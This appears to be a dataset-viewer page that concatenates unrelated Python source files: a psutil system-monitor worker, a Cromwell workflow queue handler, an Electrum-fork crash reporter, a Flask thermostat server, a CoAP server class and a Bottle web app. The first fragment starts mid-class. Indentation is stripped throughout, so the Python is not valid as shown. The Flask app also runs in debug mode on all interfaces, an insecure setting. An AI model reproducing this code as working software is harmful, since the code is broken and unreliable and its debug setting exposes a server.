logger = dashboard.getLogger(self._name)
logger.info("memoryWorker is created.")
config = dashboard.getConfig(self._name)
self._collector_time_interval = config['time_interval']
def beforeWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is start working.".format(self._name))
def afterWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is stop working.".format(self._name))
def main(self):
mem = psutil.virtual_memory()
# 总内存大小 Byte
mem_total = mem.total
# 使用率 %
mem_use_rate = mem.percent
swap = psutil.swap_memory()
# 交换区大小 Byte
swap_total = swap.total
# 使用率 %
swap_use_rate = swap.percent
# 换入字节数 Byte
swap_sin = swap.sin
# 换出字节数 Byte
swap_sout = swap.sout
record = {
'TIMESTAMP': int(time.time()),
'MEMORYTOTAL': mem_total,
'MEMORYUSERATE': mem_use_rate,
'SWAPTOTAL': swap_total,
'SWAPUSERATE': swap_use_rate,
'SWAPSIN': swap_sin,
'SWAPSOUT': swap_sout
}
database = self._dashboard.getDatabase(self._name)
config = self._dashboard.getConfig(self._name)
logger = self._dashboard.getLogger(self._name)
if database.insert(config.get('table_name'), record):
logger.debug('insert success.')
else:
logger.warn('insert fail.')
time.sleep(self._collector_time_interval)
class DiskWorker(WorkerBase):
def __init__(self, dashboard, mode='threading'):
super(DiskWorker, self).__init__(mode=mode)
self._name = 'diskWorker'
self._dashboard = dashboard
logger = dashboard.getLogger(self._name)
logger.info("diskWorker is created.")
config = dashboard.getConfig(self._name)
self._collector_time_interval = config['time_interval']
def beforeWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is start working.".format(self._name))
def afterWork(self):
logger = self._dashboard.getLogger(self._name)
logger.info("{} is stop working.".format(self._name))
def main(self):
t = int(time.time())
database = self._dashboard.getDatabase(self._name)
config = self._dashboard.getConfig(self._name)
logger = self._dashboard.getLogger(self._name)
hard_disks = psutil.disk_partitions(all=False)
for disk in hard_disks:
disk_device_name = disk.device
disk_mount_point = disk.mountpoint
disk_fstype = disk.fstype
point_info = psutil.disk_usage(disk_mount_point)
disk_total = point_info.total
disk_userate = point_info.percent
record = {
'TIMESTAMP': t,
'DEVICENAME': disk_device_name,
'MOUNTPOINT': disk_mount_point,
'FSTYPE': disk_fstype,
'TOTAL': disk_total,
'USERATE': disk_userate
}
if database.insert(config.get('table_name'), record):
logger.debug('insert success.')
else:
logger.warn('insert fail.')
time.sleep(self._collector_time_interval)
if __name__ == "__main__":
worker = WorkerBase(mode="proccessing")
worker.work()
def exitHandler(signum, frame):
worker.exit()
print "Worker is stop working now!"
exit()
import signal
signal.signal(signal.SIGINT, exitHandler)
signal.signal(signal.SIGTERM, exitHandler)
signal.signal(signal.SIGTSTP, exitHandler)
cnt = 10
while cnt != 0:
time.sleep(1)
if worker.isOK():
print "worker is working hard!"
else:
print "worker is not work now!"
if cnt == 5:
if worker.exit():
print "Make work stop."
cnt = cnt - 1
|
queue_handler.py
|
import logging
from pathlib import Path
import time
from datetime import datetime
from queue import Queue
from threading import Thread, get_ident
from copy import deepcopy
import requests
from cromwell_tools.cromwell_api import CromwellAPI
from falcon import settings
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("falcon.{module_path}".format(module_path=__name__))
class Workflow(object):
"""A simple data structure for hosting workflow data.
Besides the features for de-duplication, this class also utilizes a smaller size of chunk in memory.
"""
def __init__(self, workflow_id, bundle_uuid=None, bundle_version=None, labels=None):
self.id = workflow_id
self.bundle_uuid = bundle_uuid
self.bundle_version = bundle_version
if labels is None:
self.labels = {}
else:
self.labels = deepcopy(labels)
def __str__(self):
return str(self.id)
def __repr__(self):
return str(self.id)
def __eq__(self, other):
"""
Note: In the future, if we want to add advanced de-duplication feature to the service, besides asserting
workflow id between 2 `Workflow` objects, we might also want to check if they have the same `bundle_uuid`
and `bundle_version`.
"""
if isinstance(other, Workflow):
return self.id == other.id
return False
class QueueHandler(object):
"""
This is the queue handler component of the falcon.
This handler is responsible for retrieving `On Hold` workflows from Cromwell, maintaining a queue instance and
put the workflows into the queue for igniter to consume.
Args:
workflow_queue (queue.Queue): A queue object within the handler instance to host workflows.
thread (threading.Thread): A thread within the handler instance to execute the logic. By default it's set to
None. It should only be spawned by the function `spawn_and_start()`.
settings (dict): A dictionary contains all settings for the handler.
queue_update_interval (int): This is the how long the handler will sleep for after each time it retrieves
workflows from the Cromwell.
cromwell_query_dict (dict): This is the query dictionary handler uses for retrieving workflows from the
Cromwell. Currently this is hard-coded.
"""
def __init__(self, config_path):
self.workflow_queue = self.create_empty_queue(
-1
) # use infinite for the size of the queue for now
self.thread = None
self.settings = settings.get_settings(config_path)
self.cromwell_auth = settings.get_cromwell_auth(self.settings)
self.queue_update_interval = self.settings.get("queue_update_interval")
self.cromwell_query_dict = self.settings.get("cromwell_query_dict")
def spawn_and_start(self):
"""
Starts the thread, which is an instance variable. If thread has not been created, spawns it and then starts it.
"""
if not self.thread:
self.thread = Thread(target=self.execution_loop, name="queueHandler")
self.thread.start()
def join(self):
"""
A wrapper function around `threading.Thread.join()`.
"""
try:
self.thread.join()
except (AttributeError, AssertionError):
logger.error("The thread of this queue handler is not in a running state.")
def execution_loop(self):
logger.info(
"QueueHandler | Initializing the queue handler with thread => {0} | {1}".format(
get_ident(), datetime.now()
)
)
while True:
self.report_my_status() # Execute first to generate new handler_status.html
self.execution_event()
def execution_event(self):
logger.info(
"QueueHandler | QueueHandler thread {0} is warmed up and running. | {1}".format(
get_ident(), datetime.now()
)
)
workflow_metas = self.retrieve_workflows(self.cromwell_query_dict)
if (
workflow_metas
): # This could happen when getting either non-200 codes or 0 workflow from Cromwell
workflows = self.prepare_workflows(workflow_metas)
# This must happen before `enqueue()` is called, so that each time the queue is refreshed and updated
self.set_queue(self.create_empty_queue(-1))
self.enqueue(workflows)
else:
logger.info(
"QueueHandler | Cannot fetch any workflow from Cromwell, go back to sleep and wait for next "
"attempt. | {0}".format(datetime.now())
)
self.sleep_for(self.queue_update_interval)
def retrieve_workflows(self, query_dict):
"""
Retrieve the latest list of metadata of all "On Hold" workflows from Cromwell.
Args:
query_dict (dict): A dictionary that contains valid query parameters which can be accepted by the Cromwell
/query endpoint.
Returns:
workflow_metas (None or list): Will be None if it gets a non 200 code from Cromwell, otherwise will be a
list of workflow metadata dict blocks. e.g.
```
[
{
"name": "WorkflowName1",
"id": "xxx1",
"submission": "2018-01-01T23:49:40.620Z",
"status": "Succeeded",
"end": "2018-07-12T00:37:12.282Z",
"start": "2018-07-11T23:49:48.384Z"
},
{
"name": "WorkflowName2",
"id": "xxx2",
"submission": "2018-01-01T23:49:42.171Z",
"status": "Succeeded",
"end": "2018-07-12T00:31:27.273Z",
"start": "2018-07-11T23:49:48.385Z"
}
]
```
"""
workflow_metas = None
query_dict["additionalQueryResultFields"] = "labels"
try:
response = CromwellAPI.query(auth=self.cromwell_auth, query_dict=query_dict)
if response.status_code != 200:
logger.warning(
"QueueHandler | Failed to retrieve workflows from Cromwell | {0} | {1}".format(
response.text, datetime.now()
)
)
else:
workflow_metas = response.json()["results"]
num_workflows = len(workflow_metas)
logger.info(
"QueueHandler | Retrieved {0} workflows from Cromwell. | {1}".format(
num_workflows, datetime.now()
)
)
logger.debug(
"QueueHandler | {0} | {1}".format(workflow_metas, datetime.now())
) # TODO: remove this or not?
except (
requests.exceptions.ConnectionError,
requests.exceptions.RequestException,
) as error:
logger.error(
"QueueHandler | Failed to retrieve workflows from Cromwell | {0} | {1}".format(
error, datetime.now()
)
)
finally:
return workflow_metas
def prepare_workflows(self, workflow_metas):
"""
This function will figure out the correct order of the workflow metadata object, parse them and convert to a
iterator object that contains assembled `Workflow` objects.
Args:
workflow_metas (list): A list of workflow metadata dict blocks. e.g.
```
[
{
"name": "WorkflowName1",
"id": "xxx1",
"submission": "2018-01-01T23:49:40.620Z",
"status": "Succeeded",
"end": "2018-07-12T00:37:12.282Z",
"start": "2018-07-11T23:49:48.384Z"
},
{
"name": "WorkflowName2",
"id": "xxx2",
"submission": "2018-01-01T23:49:42.171Z",
"status": "Succeeded",
"end": "2018-07-12T00:31:27.273Z",
"start": "2018-07-11T23:49:48.385Z"
}
]
```
Returns:
workflows_iterator (map iterator): An iterator that applies `_assemble_workflow()` to every item of
the workflow_metas, yielding the result `Workflow` instance.
"""
if not self.is_workflow_list_in_oldest_first_order(workflow_metas):
workflow_metas = workflow_metas[::-1]
workflows_iterator = map(self._assemble_workflow, workflow_metas)
return workflows_iterator
def enqueue(self, workflows):
"""
Put workflows into the in-memory queue object, which is an instance variable.
Args:
workflows (iterable): An iterable(list or iterator) object that contains all `Workflow` instances that need
to be put in the in-memory queue.
"""
for workflow in workflows:
logger.debug(
"QueueHandler | Enqueuing workflow {0} | {1}".format(
workflow, datetime.now()
)
)
self.workflow_queue.put(
workflow
) # TODO: Implement and add de-duplication logic here
def set_queue(self, queue):
"""
Move the reference from the old queue to the new object to maintain the pointer integrity for the instance
variable `self.workflow_queue`. Make this a separate function so it's easier to test.
Args:
queue: A reference to a new concrete queue object which will replace the current one.
"""
self.workflow_queue = queue
@staticmethod
def create_empty_queue(max_queue_size=-1):
"""
This function works as a factory which returns a concrete Queue object. Modifying this function gives you
the ability to plug in different implementations of Queue object for the `QueueHandler` instances.
Args:
max_queue_size (int): For the current `queue.Queue()` implementation, this field is an integer that sets
the upperbound limit on the number of items that can be placed in the queue. Insertion will block once
this size has been reached, until queue items are consumed. If maxsize is less than or equal to zero,
the queue size is infinite.
Returns:
queue.Queue: A concrete `Queue` instance.
"""
return Queue(maxsize=max_queue_size)
@staticmethod
def _assemble_workflow(workflow_meta):
"""
This is a helper function that parses a block of workflow metadata object and assembles it to a `Workflow`
instance.
Args:
workflow_meta (dict): A dictionary that contains the metadata of a workflow, usually this is returned from
Cromwell and parsed by JSON utils. An example block would look like:
```
{
"name": "WorkflowName1",
"id": "xxx1",
"submission": "2018-01-01T23:49:40.620Z",
"status": "Succeeded",
"end": "2018-07-12T00:37:12.282Z",
"start": "2018-07-11T23:49:48.384Z"
}
```
Returns:
Workflow: A concrete `Workflow` instance that has necessary properties.
"""
workflow_id = workflow_meta.get("id")
workflow_labels = workflow_meta.get("labels")
workflow_bundle_uuid = (
workflow_labels.get("bundle-uuid")
if isinstance(workflow_labels, dict)
else None
)
workflow_bundle_version = (
workflow_labels.get("bundle-version")
if isinstance(workflow_labels, dict)
else None
)
workflow = Workflow(
workflow_id, workflow_bundle_uuid, workflow_bundle_version, workflow_labels
)
return workflow
@staticmethod
def is_workflow_list_in_oldest_first_order(workflow_list):
"""
This function will figure out how is the `workflow_list` is sorted.
From Cromwell v34 (https://github.com/broadinstitute/cromwell/releases/tag/34), Query results will
be returned in reverse chronological order, with the most-recently submitted workflows returned first, which
is a different behavior from the older versions.
Args:
workflow_list (list): A list of workflow metadata objects, e.g.
```
[
{
"name": "WorkflowName1",
"id": "xxx1",
"submission": "2018-01-01T23:49:40.620Z",
"status": "Succeeded",
"end": "2018-07-12T00:37:12.282Z",
"start": "2018-07-11T23:49:48.384Z"
},
{
"name": "WorkflowName2",
"id": "xxx2",
"submission": "2018-01-01T23:49:42.171Z",
"status": "Succeeded",
"end": "2018-07-12T00:31:27.273Z",
"start": "2018-07-11T23:49:48.385Z"
}
]
```
Returns:
bool: The return value. True if the workflow_list is sorted oldest first, False otherwise.
"""
CROMWELL_DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"
try:
head = datetime.strptime(
str(workflow_list[0].get("submission")), CROMWELL_DATETIME_FORMAT
)
tail = datetime.strptime(
str(workflow_list[-1].get("submission")), CROMWELL_DATETIME_FORMAT
)
return head <= tail
except ValueError:
logger.error(
"Queue | An error happened when try to parse the submission timestamps, will assume oldest first "
"for"
" the workflows returned from Cromwell | {0}".format(datetime.now())
)
return True
@staticmethod
def sleep_for(sleep_time):
time.sleep(sleep_time)
@staticmethod
def shallow_deduplicate():
"""A placeholder function for de-duplication logic, not implemented yet.
This shallow de-duplication should only search given bundle-uuid and bundle-version in the current domain,
e.g. notifications in the queue.
"""
return NotImplemented
@staticmethod
def deep_deduplicate():
"""A placeholder function for de-duplication logic, not implemented yet.
This deep de-duplication should search the given bundle-uuid and bundle-version in the whole history.
"""
return NotImplemented
@staticmethod
def report_my_status():
"""
Write a report_status.html file containing the timestamp when it ran
"""
try:
# Get timestamp now
# Converting datetime object to string
dateTimeObj = datetime.now()
timestampStr = dateTimeObj.strftime("%d-%b-%Y (%H:%M:%S)")
# Get filename full path and creates it
path = Path(settings.docRootPath)
path.mkdir(parents=True, exist_ok=True)
filename = path.joinpath(settings.docRootFile)
# create and update handler_status.html with time so we can get the info from a curl
with filename.open("w") as f:
# content of html file with timestamp
header = """<html><br><head></head><br><body><br><p>
"""
body = "Time when report my status was generated: " + timestampStr
footer = """
</p><br></body><br></html>"""
f.write("{0}{1}{2}".format(header, body, footer))
logger.info("QueueHandler | QueueHandler report status ran successfully ")
except Exception as exc:
logger.warning(
"QueueHandler | QueueHandler report Status failed with Exception: | {0}".format(
exc
)
)
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://electrum.crashhub.tachacoin.tech"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["986c", "4222"] and ".tachacoin.tech" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = "".join(traceback.format_exception(*self.exc_args))
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self):
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
main.py
|
'Smart thermostat project main module'
from queue import Queue
from flask import Flask, jsonify, render_template, request, Response
import json
import threading
try:
from rpi.sensor import Sensor
from rpi.relay import Relay
import board
HEAT_PIN = board.D21
FAN_PIN = board.D16
COOL_PIN = board.D12
except ModuleNotFoundError:
from mock.sensor import Sensor
from mock.relay import Relay
HEAT_PIN = FAN_PIN = COOL_PIN = None
from thermocontroller import ThermoController
from scheduler import Scheduler
WEATHER_QUERY = 'zip=94549'
TEMP_CHANGE_INCREMENT = 0.1
DEFAULT_DESIRED_TEMP = 21.0
BUTTON_REPEAT_DELAY_SECS = 0.3
controller = ThermoController(WEATHER_QUERY, Sensor(),
heater=Relay('Heat', HEAT_PIN), cooler=Relay('AC', COOL_PIN),
fan=Relay('Fan', FAN_PIN), desired_temp=DEFAULT_DESIRED_TEMP)
scheduler = Scheduler(controller)
app = Flask(__name__)
@app.route('/')
def index():
return render_template(
'index.html', weather_query=WEATHER_QUERY.split('=')[1],
schedule=scheduler.render())
@app.route('/increase_temperature', methods=('POST',))
def increase_temperature():
controller.increase_temperature(float(request.get_data()))
return ''
@app.route('/set_temperature', methods=('PUT',))
def set_temperature():
controller.set_temperature(float(request.get_data()))
return ''
@app.route('/activate_fan', methods=('PUT',))
def activate_fan():
controller.activate_fan(request.get_data() == b'true')
return ''
@app.route('/enable_cool', methods=('PUT',))
def enable_cool():
controller.enable_cool(request.get_data() == b'true')
return ''
@app.route('/schedule', methods=('PUT',))
def schedule():
scheduler.set(request.get_data())
return ''
@app.route('/status')
def status():
stream_state_queue = Queue(maxsize=5)
controller.add_listener(stream_state_queue)
def event_stream():
while True:
state = stream_state_queue.get()
yield 'data: {}\n\n'.format(json.dumps(state))
return Response(event_stream(), mimetype="text/event-stream")
@app.route('/all-status')
def all_status():
return jsonify(controller.status_history)
def _background_thread():
while True:
scheduler.update()
controller.update()
threading.Thread(target=_background_thread).start()
app.run(host='0.0.0.0', threaded=True, debug=True, use_reloader=False)
|
coap.py
|
import logging
import logging.config
import os
import random
import re
import socket
import threading
import xml.etree.ElementTree as ElementTree
import struct
from coapclient import HelperClient
from coapthon.layers.forwardLayer import ForwardLayer
from coapthon.messages.message import Message
from coapthon import defines
from coapthon.resources.remoteResource import RemoteResource
from coapthon.utils import Tree, create_logging
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.resourcelayer import ResourceLayer
from coapthon.messages.request import Request
from coapthon.layers.messagelayer import MessageLayer
from coapthon.resources.resource import Resource
from coapthon.serializer import Serializer
if not os.path.isfile("logging.conf"):
create_logging()
logger = logging.getLogger(__name__)
logging.config.fileConfig("logging.conf", disable_existing_loggers=False)
class CoAP(object):
def __init__(self, server_address, multicast=False, starting_mid=None):
self.stopped = threading.Event()
self.stopped.clear()
self.to_be_stopped = []
self.purge = threading.Thread(target=self.purge)
self.purge.start()
self._messageLayer = MessageLayer(starting_mid)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._forwardLayer = ForwardLayer(self)
self.resourceLayer = ResourceLayer(self)
# Resource directory
root = Resource('root', self, visible=False, observable=False, allow_children=True)
root.path = '/'
self.root = Tree()
self.root["/"] = root
self._serializer = None
self.server_address = server_address
self.multicast = multicast
addrinfo = socket.getaddrinfo(self.server_address[0], None)[0]
if self.multicast: # pragma: no cover
# Create a socket
self._socket = socket.socket(addrinfo[1], socket.SOCK_DGRAM)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind it to the port
self._socket.bind(('', self.server_address[1]))
group_bin = socket.inet_pton(addrinfo[1], addrinfo[4][0])
# Join group
if addrinfo[0] == socket.AF_INET: # IPv4
mreq = group_bin + struct.pack('=I', socket.INADDR_ANY)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
else:
mreq = group_bin + struct.pack('@I', 0)
self._socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
else:
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(self.server_address)
def purge(self):
while not self.stopped.isSet():
self.stopped.wait(timeout=defines.EXCHANGE_LIFETIME)
self._messageLayer.purge()
def listen(self, timeout=10):
"""
Listen for incoming messages. Timeout is used to check if the server must be switched off.
:param timeout: Socket Timeout in seconds
"""
self._socket.settimeout(float(timeout))
while not self.stopped.isSet():
try:
data, client_address = self._socket.recvfrom(4096)
except socket.timeout:
continue
try:
self.receive_datagram((data, client_address))
except RuntimeError:
print "Exception with Executor"
self._socket.close()
def close(self):
"""
Stop the server.
"""
logger.info("Stop server")
self.stopped.set()
for event in self.to_be_stopped:
event.set()
self._socket.close()
def receive_datagram(self, args):
"""
Receive datagram from the udp socket.
:rtype : Message
"""
data, client_address = args
serializer = Serializer()
message = serializer.deserialize(data, client_address)
if isinstance(message, int):
logger.error("receive_datagram - BAD REQUEST")
rst = Message()
rst.destination = client_address
rst.type = defines.Types["RST"]
rst.code = message
self.send_datagram(rst)
return
logger.debug("receive_datagram - " + str(message))
if isinstance(message, Request):
transaction = self._messageLayer.receive_request(message)
if transaction.request.duplicated and transaction.completed:
logger.debug("message duplicated,transaction completed")
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
elif transaction.request.duplicated and not transaction.completed:
logger.debug("message duplicated,transaction NOT completed")
self._send_ack(transaction)
return
transaction.separate_timer = self._start_separate_timer(transaction)
transaction = self._blockLayer.receive_request(transaction)
if transaction.block_transfer:
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
transaction = self._observeLayer.receive_request(transaction)
transaction = self._forwardLayer.receive_request(transaction)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
if transaction.response is not None:
if transaction.response.type == defines.Types["CON"]:
self._start_retrasmission(transaction, transaction.response)
self.send_datagram(transaction.response)
elif isinstance(message, Message):
transaction = self._messageLayer.receive_empty(message)
if transaction is not None:
transaction = self._blockLayer.receive_empty(message, transaction)
self._observeLayer.receive_empty(message, transaction)
else: # is Response
logger.error("Received response from %s", message.source)
def send_datagram(self, message):
"""
:type message: Message
:param message:
"""
if not self.stopped.isSet():
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def _start_retrasmission(self, transaction, message):
"""
:type transaction: Transaction
:param transaction:
:type message: Message
:param message:
:rtype : Future
"""
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
if message.observe is not None:
self._observeLayer.remove_subscriber(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def _start_separate_timer(self, transaction):
"""
:type transaction: Transaction
:param transaction:
:type message: Message
:param message:
:rtype : Future
"""
t = threading.Timer(defines.ACK_TIMEOUT, self._send_ack, (transaction,))
t.start()
return t
@staticmethod
def _stop_separate_timer(timer):
"""
:type future: Future
:param future:
"""
timer.cancel()
def _send_ack(self, transaction):
# Handle separate
"""
Sends an ACK message for the request.
:param request: [request, sleep_time] or request
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.request.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.request, ack)
self.send_datagram(ack)
|
main.py
|
#qpy:webapp:Hello Qpython
#qpy://127.0.0.1:8080/
"""
This is a sample for qpython webapp
"""
from bottle import Bottle, ServerAdapter
from bottle import run, debug, route, error, static_file, template
######### QPYTHON WEB SERVER ###############
class MyWSGIRefServer(ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
#sys.stderr.close()
import threading
threading.Thread(target=self.server.shutdown).start()
#self.server.shutdown()
self.server.server_close() #<--- alternative but causes bad fd exception
print("# qpyhttpd stop")
######### BUILT-IN ROUTERS ###############
@route('/__exit', method=['GET','HEAD'])
def __exit():
global server
server.stop()
@route('/__ping')
def __ping():
return "ok"
@route('/assets/<filepath:path>')
def server_static(filepath):
return static_file(filepath, root='/sdcard')
######### WEBAPP ROUTERS ###############
@route('/')
def home():
return template(
'<h1>Hello {{name}} !</h1><a href="/assets/qpython/projects3/posenetOffline/index075.html">index075</a>'
,name='posenetOffline')
######### WEBAPP ROUTERS ###############
app = Bottle()
app.route('/', method='GET')(home)
app.route('/__exit', method=['GET','HEAD'])(__exit)
app.route('/__ping', method=['GET','HEAD'])(__ping)
app.route('/assets/<filepath:path>', method='GET')(server_static)
try:
server = MyWSGIRefServer(host="127.0.0.1", port="8080")
app.run(server=server,reloader=False)
except (Exception) as ex:
print("Exception: %s" % repr(ex))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.